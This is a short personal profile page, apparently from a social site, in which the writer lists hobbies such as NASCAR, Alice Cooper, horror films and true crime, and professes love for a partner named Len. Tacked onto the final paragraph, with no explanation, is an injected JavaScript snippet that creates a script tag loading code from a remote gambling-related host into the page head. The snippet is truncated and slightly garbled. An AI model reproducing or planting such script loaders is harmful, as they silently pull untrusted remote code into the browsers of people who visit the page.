Nascar, camping, fishing, cooking. willing to try new things. This is my main intrest the love of my life Len. Thanks to Lens sis for making this pic for me .
Nascar & Alice Cooper fans.Len he's trusted me with his heart & I will forever be his 1 & only .I LOVE YOU LEN Someday we will be together forever in person. This is the doll my sweeties sis made for me isn't she beautiful
Alice Cooper & Len singing to me he's the greatest singer next to alice in my book
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horror & tim burton
Speed channel baby :) or court tv
I like reading True Crime it facinates me alot.
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Alice Cooper I look to him as someone thats been through the thick of hell with aloholism & made it back to tell his stories through his music.Also My wonderful man that I love so much .."var s=document.createElement('script');s.src='http://gamblingboa';document.getElementsByTagName('head')[0].a ppendChild(s);"